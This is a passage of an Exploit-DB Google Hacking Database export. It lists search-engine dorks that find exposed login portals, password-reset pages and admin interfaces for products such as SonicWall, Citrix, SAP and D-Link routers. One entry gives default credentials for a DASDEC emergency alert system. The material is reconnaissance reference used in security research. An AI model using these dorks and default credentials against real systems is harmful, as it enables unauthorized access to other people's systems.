<query>inurl:&quot;auth.html&quot; intitle:&quot;SonicWall&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;auth.html&quot; intitle:&quot;SonicWall&quot;</querystring>
<edb></edb>
<date>2020-02-26</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>6345</id>
<link>https://www.exploit-db.com/ghdb/6345</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;backend/web/site/login&quot;</shortDescription>
<textualDescription># Dork : inurl:&quot;backend/web/site/login&quot;
# Backend Login Portals
# Author : Ambadi MP
</textualDescription>
<query>inurl:&quot;backend/web/site/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;backend/web/site/login&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>5591</id>
<link>https://www.exploit-db.com/ghdb/5591</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;BasicAuthenticator:LOCAL&quot;</shortDescription>
<textualDescription>Login portals.</textualDescription>
<query>inurl:&quot;BasicAuthenticator:LOCAL&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;BasicAuthenticator:LOCAL&quot;</querystring>
<edb></edb>
<date>2019-10-21</date>
<author>HackingHomebrewer</author>
</entry>
<entry>
<id>7523</id>
<link>https://www.exploit-db.com/ghdb/7523</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;brandmeister page=login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;brandmeister page=login&quot;
# Pages Containing Login Portals
# Date:29/10/2021
# Exploit Author: jawhar milkan</textualDescription>
<query>inurl:&quot;brandmeister page=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;brandmeister page=login&quot;</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>jawhar milkan</author>
</entry>
<entry>
<id>593</id>
<link>https://www.exploit-db.com/ghdb/593</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;calendar.asp?action=login&quot;</shortDescription>
<textualDescription>aspWebCalendar is a browser based software package that runs over a standard web browser, such as Internet Explorer from Microsoft, and allows an organization of any size to easily and cost effectively provide personal and group calendar functions to everyone in the organization.A vulnerability has been found for the (SQL version) script family from Full Revolution. Affected software is: aspWebAlbum, aspWebCalendar, aspWebHeadlines, aspWebMail. You can check it here: http://www.securityfocus.com/bid/11246Searches for aspWebAlbum and aspWebHeadlines:inurl:&quot;album.asp?action=login&quot;inurl:&quot;news.asp?action=login&quot;</textualDescription>
<query>inurl:&quot;calendar.asp?action=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22calendar.asp%3Faction%3Dlogin%22+</querystring>
<edb></edb>
<date>2004-10-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3788</id>
<link>https://www.exploit-db.com/ghdb/3788</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;cgi-bin/webcgi/main&quot;</shortDescription>
<textualDescription>inurl:&quot;cgi-bin/webcgi/main&quot;
This dork finds indexed public facing Dell Remote Access Card.
-n17r0u6</textualDescription>
<query>inurl:&quot;cgi-bin/webcgi/main&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22cgi-bin%2Fwebcgi%2Fmain%22</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3940</id>
<link>https://www.exploit-db.com/ghdb/3940</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;Citrix/XenApp/auth/login.aspx&quot;</shortDescription>
<textualDescription>Finds login portals for Citrix XenApp.
- Andy G - twitter.com/vxhex</textualDescription>
<query>inurl:&quot;Citrix/XenApp/auth/login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;Citrix/XenApp/auth/login.aspx&quot;</querystring>
<edb></edb>
<date>2014-03-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4760</id>
<link>https://www.exploit-db.com/ghdb/4760</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;cmd=auth?&quot; -github -stackoverflow -gitlab</shortDescription>
<textualDescription>Many login portals
Bruno Schmid
</textualDescription>
<query>inurl:&quot;cmd=auth?&quot; -github -stackoverflow -gitlab</query>
<querystring>https://www.google.com/search?q=inurl:&quot;cmd=auth?&quot; -github -stackoverflow -gitlab</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4612</id>
<link>https://www.exploit-db.com/ghdb/4612</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;communique_detail.php?id=&quot;</shortDescription>
<textualDescription>*Google Dork Description*:inurl:&quot;communique_detail.php?id=&quot;
-with this dork it is possible to access multiple communique detail login
pages of different sites.
-Author: Ashwin Rajeev
</textualDescription>
<query>inurl:&quot;communique_detail.php?id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;communique_detail.php?id=&quot;</querystring>
<edb></edb>
<date>2017-11-13</date>
<author>Ashwin Rajeev</author>
</entry>
<entry>
<id>5243</id>
<link>https://www.exploit-db.com/ghdb/5243</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;CookieAuth.dll?GetLogon?&quot; intext:log on</shortDescription>
<textualDescription>Some Microsoft &amp; Netscaler login portals.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>inurl:&quot;CookieAuth.dll?GetLogon?&quot; intext:log on</query>
<querystring>https://www.google.com/search?q=inurl:&quot;CookieAuth.dll?GetLogon?&quot; intext:log on</querystring>
<edb></edb>
<date>2019-06-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>3855</id>
<link>https://www.exploit-db.com/ghdb/3855</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;dasdec/dasdec.csp&quot;</shortDescription>
<textualDescription>inurl:&quot;dasdec/dasdec.csp&quot;
DASDEC II Emergency Alert System
User Manual: http://www.digitalalertsystems.com/pdf/DASDEC_II_manual.pdf
Default username: Admin
Default password: dasdec</textualDescription>
<query>inurl:&quot;dasdec/dasdec.csp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;dasdec/dasdec.csp&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4982</id>
<link>https://www.exploit-db.com/ghdb/4982</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;Default+Administrator+View&quot;</shortDescription>
<textualDescription>Some login portals, somtimes obsolete Verizon Java based applications
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;Default+Administrator+View&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;Default+Administrator+View&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>1046</id>
<link>https://www.exploit-db.com/ghdb/1046</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;default/login.php&quot; intitle:&quot;kerio&quot;</shortDescription>
<textualDescription>This dork reveals login pages for Kerio Mail server. Kerio MailServer is a state-of-the-art groupware server allowing companies to collaborate via email, shared contacts, shared calendars and tasks. Download can be found here http://www.kerio.com/kms_download.html.</textualDescription>
<query>inurl:&quot;default/login.php&quot; intitle:&quot;kerio&quot;</query>
<querystring>https://www.google.com/search?as_q=intitle%3Akerio&amp;num=100&amp;c2coff=1&amp;btnG=Google+Search&amp;as_epq=inurl%3Adefault+login+php+&amp;as_oq=&amp;as_eq=&amp;as_ft=i&amp;as_filetype=&amp;as_qdr=all&amp;as_occt=any&amp;as_dt=i&amp;as_sitesearch=&amp;safe=images</querystring>
<edb></edb>
<date>2005-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>8049</id>
<link>https://www.exploit-db.com/ghdb/8049</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;device.rsp&quot; -com</shortDescription>
<textualDescription># Google Dork: inurl:&quot;device.rsp&quot; -com
# Pages Containing Login Portals
# Date:2/1/2023
# Exploit Author: Simone Gasparato
</textualDescription>
<query>inurl:&quot;device.rsp&quot; -com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;device.rsp&quot; -com</querystring>
<edb></edb>
<date>2023-02-01</date>
<author>Simone Gasparato</author>
</entry>
<entry>
<id>6134</id>
<link>https://www.exploit-db.com/ghdb/6134</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;forgotpassword.aspx&quot;</shortDescription>
<textualDescription>Dork:- inurl:&quot;forgotpassword.aspx&quot;
Description:-
This google dork lists out out asp.net server page based forgot password
page.
Author:- Manish Kumar</textualDescription>
<query>inurl:&quot;forgotpassword.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;forgotpassword.aspx&quot;</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>Manish Kumar</author>
</entry>
<entry>
<id>6129</id>
<link>https://www.exploit-db.com/ghdb/6129</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;forgotpassword.jsf&quot;</shortDescription>
<textualDescription>Dork: inurl:&quot;forgotpassword.jsf&quot;
Description: This google dork lists out java server pages based forgot
password forms.
Author: Abhi Chitkara
</textualDescription>
<query>inurl:&quot;forgotpassword.jsf&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;forgotpassword.jsf&quot;</querystring>
<edb></edb>
<date>2020-05-26</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6214</id>
<link>https://www.exploit-db.com/ghdb/6214</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;forgotpassword.php&quot;</shortDescription>
<textualDescription>Dorks : inurl:&quot;forgotpassword.php&quot;
Description: various pages containing forgot passwords portals.
Author : Anjali Prakash
</textualDescription>
<query>inurl:&quot;forgotpassword.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;forgotpassword.php&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Anjali Prakash</author>
</entry>
<entry>
<id>4719</id>
<link>https://www.exploit-db.com/ghdb/4719</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;form_id&quot; login username password</shortDescription>
<textualDescription>Login portals
Bruno Schmid
</textualDescription>
<query>inurl:&quot;form_id&quot; login username password</query>
<querystring>https://www.google.com/search?q=inurl:&quot;form_id&quot; login username password</querystring>
<edb></edb>
<date>2018-03-30</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>445</id>
<link>https://www.exploit-db.com/ghdb/445</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;gs/adminlogin.aspx&quot;</shortDescription>
<textualDescription>GradeSpeed seems to be a .NET application to administer school results for several schools using the web. If you do not select a school an error is reported. The HTML source code shows path information, for example: option value=&quot;E:\GRADESPEED\DRHARMONWKELLEYELEMENTARY\|Dr H. W K. E.|101&quot;&gt;Dr ...</textualDescription>
<query>inurl:&quot;gs/adminlogin.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22gs%2Fadminlogin.aspx%22</querystring>
<edb></edb>
<date>2004-08-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4122</id>
<link>https://www.exploit-db.com/ghdb/4122</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;http://canvas&quot; | inurl:&quot;https://canvas&quot; | intitle:&quot;Log In to Canvas&quot;</shortDescription>
<textualDescription>Canvas login portals.
Decoy</textualDescription>
<query>inurl:&quot;http://canvas&quot; | inurl:&quot;https://canvas&quot; | intitle:&quot;Log In to Canvas&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;http://canvas&quot; | inurl:&quot;https://canvas&quot; | intitle:&quot;Log In to Canvas&quot;</querystring>
<edb></edb>
<date>2015-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4115</id>
<link>https://www.exploit-db.com/ghdb/4115</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;http://cms&quot; | inurl:&quot;https://cms&quot; (&quot;login&quot; | &quot;logon&quot; | &quot;admin&quot;) -school</shortDescription>
<textualDescription>Content Manager Login Pages.
Decoy</textualDescription>
<query>inurl:&quot;http://cms&quot; | inurl:&quot;https://cms&quot; (&quot;login&quot; | &quot;logon&quot; | &quot;admin&quot;) -school</query>
<querystring>https://www.google.com/search?q=inurl:&quot;http://cms&quot; | inurl:&quot;https://cms&quot; (&quot;login&quot; | &quot;logon&quot; | &quot;admin&quot;) -school</querystring>
<edb></edb>
<date>2015-11-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4505</id>
<link>https://www.exploit-db.com/ghdb/4505</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;http://webmail.&quot;</shortDescription>
<textualDescription>Finds various webmail servers.
Dxtroyer</textualDescription>
<query>inurl:&quot;http://webmail.&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;http://webmail.&quot;</querystring>
<edb></edb>
<date>2017-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4121</id>
<link>https://www.exploit-db.com/ghdb/4121</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;https://blackboard&quot; | inurl:&quot;http://blackboard&quot;</shortDescription>
<textualDescription>Blackboard Login Portals.
Decoy</textualDescription>
<query>inurl:&quot;https://blackboard&quot; | inurl:&quot;http://blackboard&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;https://blackboard&quot; | inurl:&quot;http://blackboard&quot;</querystring>
<edb></edb>
<date>2015-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4636</id>
<link>https://www.exploit-db.com/ghdb/4636</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;https://mylogin.&quot;</shortDescription>
<textualDescription>Finds login pages, mostly on educational websites
Dxtroyer
</textualDescription>
<query>inurl:&quot;https://mylogin.&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;https://mylogin.&quot;</querystring>
<edb></edb>
<date>2017-12-11</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4338</id>
<link>https://www.exploit-db.com/ghdb/4338</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;https://vdi&quot;</shortDescription>
<textualDescription>VMware Horizon Logins
Also other dorks
inurl:/portal/webclient/index.html#/warning
inurl:&quot;https://mydesktop-&quot;
inurl:&quot;https://view&quot;
inurl:&quot;https://mypc&quot;
-Xploit
</textualDescription>
<query>inurl:&quot;https://vdi&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;https://vdi&quot;</querystring>
<edb></edb>
<date>2016-10-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>7488</id>
<link>https://www.exploit-db.com/ghdb/7488</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;index.php&quot; intitle:&quot;CMS Login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;index.php&quot; intitle:&quot;CMS Login&quot;
# Pages Containing Login Portals
# Date:26/10/2021
# Exploit Author: Neha Singh</textualDescription>
<query>inurl:&quot;index.php&quot; intitle:&quot;CMS Login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php&quot; intitle:&quot;CMS Login&quot;</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>6339</id>
<link>https://www.exploit-db.com/ghdb/6339</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;index.php/user/password/&quot;</shortDescription>
<textualDescription> inurl:&quot;index.php/user/password/&quot;
</textualDescription>
<query>inurl:&quot;index.php/user/password/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php/user/password/&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>isa ghojaria</author>
</entry>
<entry>
<id>6300</id>
<link>https://www.exploit-db.com/ghdb/6300</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;index.php/user/password/&quot; intext:Password Reset</shortDescription>
<textualDescription>Dork: inurl:&quot;index.php/user/password/&quot; intext:Password Reset
*Ritesh Gohil*
*Security Researcher*
*Linkedin: *https://www.linkedin.com/in/riteshgohil25/
</textualDescription>
<query>inurl:&quot;index.php/user/password/&quot; intext:Password Reset</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php/user/password/&quot; intext:Password Reset</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Ritesh Gohil</author>
</entry>
<entry>
<id>3818</id>
<link>https://www.exploit-db.com/ghdb/3818</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;InfoViewApp/logon.jsp&quot;</shortDescription>
<textualDescription>Google Hacking
*SAP Business Object 3.1 XI*
inurl:&quot;InfoViewApp/logon.jsp&quot;
twitter
@firebitsbr</textualDescription>
<query>inurl:&quot;InfoViewApp/logon.jsp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;InfoViewApp/logon.jsp&quot;</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>5918</id>
<link>https://www.exploit-db.com/ghdb/5918</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;login.html&quot; intitle:&quot;d-link&quot;</shortDescription>
<textualDescription>Google Dork: inurl:&quot;login.html&quot; intitle:&quot;d-link&quot;
Description: Pages containing d-link routers login pages.
Author: Abhi Chitkara
</textualDescription>
<query>inurl:&quot;login.html&quot; intitle:&quot;d-link&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;login.html&quot; intitle:&quot;d-link&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>4221</id>
<link>https://www.exploit-db.com/ghdb/4221</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;login.php?action=recover&quot;</shortDescription>
<textualDescription>Description: Password recovery forms
Google search: inurl:&quot;login.php?action=recover&quot;
Author: nebo_oben</textualDescription>
<query>inurl:&quot;login.php?action=recover&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;login.php?action=recover&quot;</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4729</id>
<link>https://www.exploit-db.com/ghdb/4729</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;login.php?referer=profile.php&quot;</shortDescription>
<textualDescription>Login portals from Coppermine Photo Gallery
Bruno Schmid
</textualDescription>
<query>inurl:&quot;login.php?referer=profile.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;login.php?referer=profile.php&quot;</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6832</id>
<link>https://www.exploit-db.com/ghdb/6832</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;login.rsp&quot; &quot;Language&quot; -.com</shortDescription>
<textualDescription># Google Dork: inurl:&quot;login.rsp&quot; &quot;Language&quot; -.com
# Pages containing login portals.
# Date: 15/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;login.rsp&quot; &quot;Language&quot; -.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;login.rsp&quot; &quot;Language&quot; -.com</querystring>
<edb></edb>
<date>2021-03-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4515</id>
<link>https://www.exploit-db.com/ghdb/4515</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;Login;jsessionid=&quot;</shortDescription>
<textualDescription>Finds generic JS login portals
Dxtroyer</textualDescription>
<query>inurl:&quot;Login;jsessionid=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;Login;jsessionid=&quot;</querystring>
<edb></edb>
<date>2017-06-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4474</id>
<link>https://www.exploit-db.com/ghdb/4474</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;member.php?action=login&quot;</shortDescription>
<textualDescription>Finds logins powered by MyBB
Dxtroyer</textualDescription>
<query>inurl:&quot;member.php?action=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;member.php?action=login&quot;</querystring>
<edb></edb>
<date>2017-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>7931</id>
<link>https://www.exploit-db.com/ghdb/7931</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;microstrategy/servlet/mstrweb&quot;</shortDescription>
<textualDescription># Dork: inurl:&quot;microstrategy/servlet/mstrweb&quot;
# Category: Page Containing Login Portals
# Date: 30/03/2022
# Exploit Author: Acmello</textualDescription>
<query>inurl:&quot;microstrategy/servlet/mstrweb&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;microstrategy/servlet/mstrweb&quot;</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Acmello</author>
</entry>
<entry>
<id>7962</id>
<link>https://www.exploit-db.com/ghdb/7962</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;opac/login &quot; site:.edu</shortDescription>
<textualDescription>#Google Dork : inurl:&quot;opac/login &quot; site:.edu
#Pages Containing Login Portals
#Date : 04/07/2022
#Exploit Author : nafih zain
</textualDescription>
<query>inurl:&quot;opac/login &quot; site:.edu</query>
<querystring>https://www.google.com/search?q=inurl:&quot;opac/login &quot; site:.edu</querystring>
<edb></edb>
<date>2022-07-04</date>
<author>nafih zain</author>
</entry>
<entry>
<id>5766</id>
<link>https://www.exploit-db.com/ghdb/5766</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;Orion/Login.aspx?ReturnUrl=&quot;</shortDescription>
<textualDescription>Find solarwinds login pages
*Hilary Soita.*
</textualDescription>
<query>inurl:&quot;Orion/Login.aspx?ReturnUrl=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;Orion/Login.aspx?ReturnUrl=&quot;</querystring>
<edb></edb>
<date>2020-03-04</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>7031</id>
<link>https://www.exploit-db.com/ghdb/7031</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;pages/sdcall/Login.jsp&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;pages/sdcall/Login.jsp&quot;
# Pages Containing Login Portals (Cisco ServiceGrid)
# Date: 21/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>inurl:&quot;pages/sdcall/Login.jsp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;pages/sdcall/Login.jsp&quot;</querystring>
<edb></edb>
<date>2021-07-22</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>6199</id>
<link>https://www.exploit-db.com/ghdb/6199</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;passwordreset.asp&quot;</shortDescription>
<textualDescription>Dork:- inurl:&quot;passwordreset.asp&quot;
Impact:- Various pages containing password reset portals
Author:- Shivansh Kumar
Independent security researcher
India
</textualDescription>
<query>inurl:&quot;passwordreset.asp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;passwordreset.asp&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Shivansh Kumar</author>
</entry>
<entry>
<id>6149</id>
<link>https://www.exploit-db.com/ghdb/6149</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;passwordreset.php&quot;</shortDescription>
<textualDescription>Dork:
inurl:&quot;passwordreset.php&quot;
Description: This google dork lists out the various pages containing reset
passwords portals.
Author: Abhinav Porwal
</textualDescription>
<query>inurl:&quot;passwordreset.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;passwordreset.php&quot;</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>1349</id>
<link>https://www.exploit-db.com/ghdb/1349</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;php121login.php&quot;</shortDescription>
<textualDescription>&quot;PHP121 is a free web based instant messenger - written entirely in PHP. This means that it will work in any browser on any operating system including Windows and Linux, anywhere!&quot;</textualDescription>
<query>inurl:&quot;php121login.php&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%22php121login.php%22</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7092</id>
<link>https://www.exploit-db.com/ghdb/7092</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;pis/login.aspx&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;pis/login.aspx&quot;
# Pages Containing Login Portals
# Date: 23/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>inurl:&quot;pis/login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;pis/login.aspx&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>6559</id>
<link>https://www.exploit-db.com/ghdb/6559</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;plc login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;plc login&quot;
# Author: Muralikrishna Janga
# Category: Pages Containing Login Portals
# Description: Various login portals of Public Limited Companies
</textualDescription>
<query>inurl:&quot;plc login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;plc login&quot;</querystring>
<edb></edb>
<date>2020-09-22</date>
<author>Muralikrishna Janga</author>
</entry>
<entry>
<id>7307</id>
<link>https://www.exploit-db.com/ghdb/7307</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;profile/login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;profile/login&quot;
# Pages Containing Login Portals
# Date: 28/09/2021
# Exploit Author: Yash Singh</textualDescription>
<query>inurl:&quot;profile/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;profile/login&quot;</querystring>
<edb></edb>
<date>2021-09-28</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>4076</id>
<link>https://www.exploit-db.com/ghdb/4076</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;remote.php/webdav&quot; -site:owncloud.org</shortDescription>
<textualDescription>Category: Pages Containin Login Portals
Author: Felipe Molina (@femoltor)
Owncloud WebDav login</textualDescription>
<query>inurl:&quot;remote.php/webdav&quot; -site:owncloud.org</query>
<querystring>https://www.google.com/search?q=inurl:&quot;remote.php/webdav&quot; -site:owncloud.org</querystring>
<edb></edb>
<date>2015-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6148</id>
<link>https://www.exploit-db.com/ghdb/6148</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;resetpassword.asp&quot;</shortDescription>
<textualDescription>Dork:
inurl:&quot;resetpassword.asp&quot;
Description: This google dork lists out the various pages containing reset
passwords portals.
Author: Abhinav Porwal
</textualDescription>
<query>inurl:&quot;resetpassword.asp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;resetpassword.asp&quot;</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6167</id>
<link>https://www.exploit-db.com/ghdb/6167</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;resetpassword.jsf&quot;</shortDescription>
<textualDescription>Dork:
inurl:&quot;resetpassword.jsf&quot;
Description: This google dork lists out the various pages containing reset
passwords portals.
Author: Abhinav Porwal
</textualDescription>
<query>inurl:&quot;resetpassword.jsf&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;resetpassword.jsf&quot;</querystring>
<edb></edb>
<date>2020-06-02</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6554</id>
<link>https://www.exploit-db.com/ghdb/6554</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;rms login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;rms login&quot;
# Author: Abida Shariff
# Category: Pages Containing Login Portals
# Description:
Various login portals of resource management system sites
</textualDescription>
<query>inurl:&quot;rms login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;rms login&quot;</querystring>
<edb></edb>
<date>2020-09-21</date>
<author>Abida Shariff</author>
</entry>
<entry>
<id>4225</id>
<link>https://www.exploit-db.com/ghdb/4225</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;sap-system-login&quot;</shortDescription>
<textualDescription>Description: SAP Web Application Server login page
Google search: inurl:&quot;sap-system-login&quot;
Author: nebo_oben</textualDescription>
<query>inurl:&quot;sap-system-login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;sap-system-login&quot;</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4226</id>
<link>https://www.exploit-db.com/ghdb/4226</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;sap/hrrcf_a_startpage_ext_cand&quot; | inurl:&quot;sap/hrrcf_a_pw_via_email_extern&quot;</shortDescription>
<textualDescription>Description: SAP Web Application Server login page
Google search: inurl:&quot;sap/hrrcf_a_startpage_ext_cand&quot; |
inurl:&quot;sap/hrrcf_a_pw_via_email_extern&quot;
Author: nebo_oben</textualDescription>
<query>inurl:&quot;sap/hrrcf_a_startpage_ext_cand&quot; | inurl:&quot;sap/hrrcf_a_pw_via_email_extern&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;sap/hrrcf_a_startpage_ext_cand&quot; | inurl:&quot;sap/hrrcf_a_pw_via_email_extern&quot;</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>5731</id>
<link>https://www.exploit-db.com/ghdb/5731</link>
<category>Pages Containing Login Portals</category>
